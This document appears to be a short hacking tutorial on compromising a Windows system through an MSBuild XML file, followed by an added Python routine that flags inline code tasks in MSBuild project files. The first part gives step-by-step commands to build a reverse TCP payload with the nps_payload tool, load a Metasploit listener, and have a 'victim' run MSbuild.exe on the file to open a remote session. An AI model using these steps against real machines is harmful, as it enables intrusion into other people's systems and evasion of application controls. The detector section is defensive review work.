In this tutorial, we will find out whether our Windows system can be compromised through an XML file that is run by MSBuild.
For this tutorial, I will use a tool that is not too famous, and I will also use Metasploit, which is quite famous these days.
ATTACK
First of all, download this tool from GitHub with this command:
git clone https://github.com/trustedsec/nps_payload.git
Now go to the downloaded folder. We will use python3 to run the tool:
python3 nps_payload.py
or
./nps_payload.py
After running the command, it will ask you to choose some options.
1. First, we will choose to make a payload in XML.
2. Now it will ask you to choose among TCP, HTTP and HTTPS. We will select 1 for TCP.
3. Now give your local IP and local port.
Half of our work is done.
Now that we have an XML file (msbuild_nps.xml) and a Metasploit resource script (msbuild_nps.rc), we can use these to hack into Windows.
Run this command to load the resource script:
msfconsole -r msbuild_nps.rc
After this, you will need to find a way to make your victim execute the XML file on a Windows system with MSBuild.
On the Windows system, open cmd, go to the Microsoft .NET Framework directory and run this command:
MSbuild.exe msbuild_nps.xml
That’s it. Now check your Metasploit; there might be a session. If there isn't one yet, don't panic. It can take a while.
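To check a project file before MSBuild ever runs it, here is an added example (not part of the original tutorial and not code from nps_payload). MSBuild executes code from a project file through inline tasks, that is, a UsingTask element with a code task factory and an embedded Code body, and the function below flags that pattern. The function names and both sample projects are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Task factories that compile source embedded in the project file at build time.
INLINE_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}

# Constructed sample: an inline task whose code body is a harmless placeholder.
SAMPLE_INLINE = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Demo /></Target>
  <UsingTask TaskName="Demo" TaskFactory="CodeTaskFactory"
             AssemblyFile="Microsoft.Build.Tasks.v4.0.dll">
    <Task><Code Type="Class" Language="cs"><![CDATA[ /* placeholder */ ]]></Code></Task>
  </UsingTask>
</Project>"""

# Constructed sample: an ordinary project with no embedded code.
SAMPLE_PLAIN = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build"><Message Text="hello" /></Target>
</Project>"""

def local(tag):
    """Drop the '{namespace}' prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1].lower()

def inline_task_findings(project_xml):
    """Return reasons an MSBuild project deserves review; empty list if none."""
    try:
        root = ET.fromstring(project_xml)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        name = local(el.tag)
        attrs = {k.lower(): v for k, v in el.attrib.items()}
        if name == "usingtask" and attrs.get("taskfactory", "").lower() in INLINE_FACTORIES:
            findings.append(f"inline task '{attrs.get('taskname', '?')}' uses {attrs['taskfactory']}")
        elif name == "code" and (el.text or "").strip():
            findings.append(f"embedded {attrs.get('language', 'unknown')} source ({len(el.text)} chars)")
    return findings

if __name__ == "__main__":
    for label, doc in (("inline", SAMPLE_INLINE), ("plain", SAMPLE_PLAIN)):
        print(label, inline_task_findings(doc) or "no inline code found")
```

A non-empty result means the file will compile and run embedded source when MSBuild.exe builds it, so it should be reviewed like any other executable.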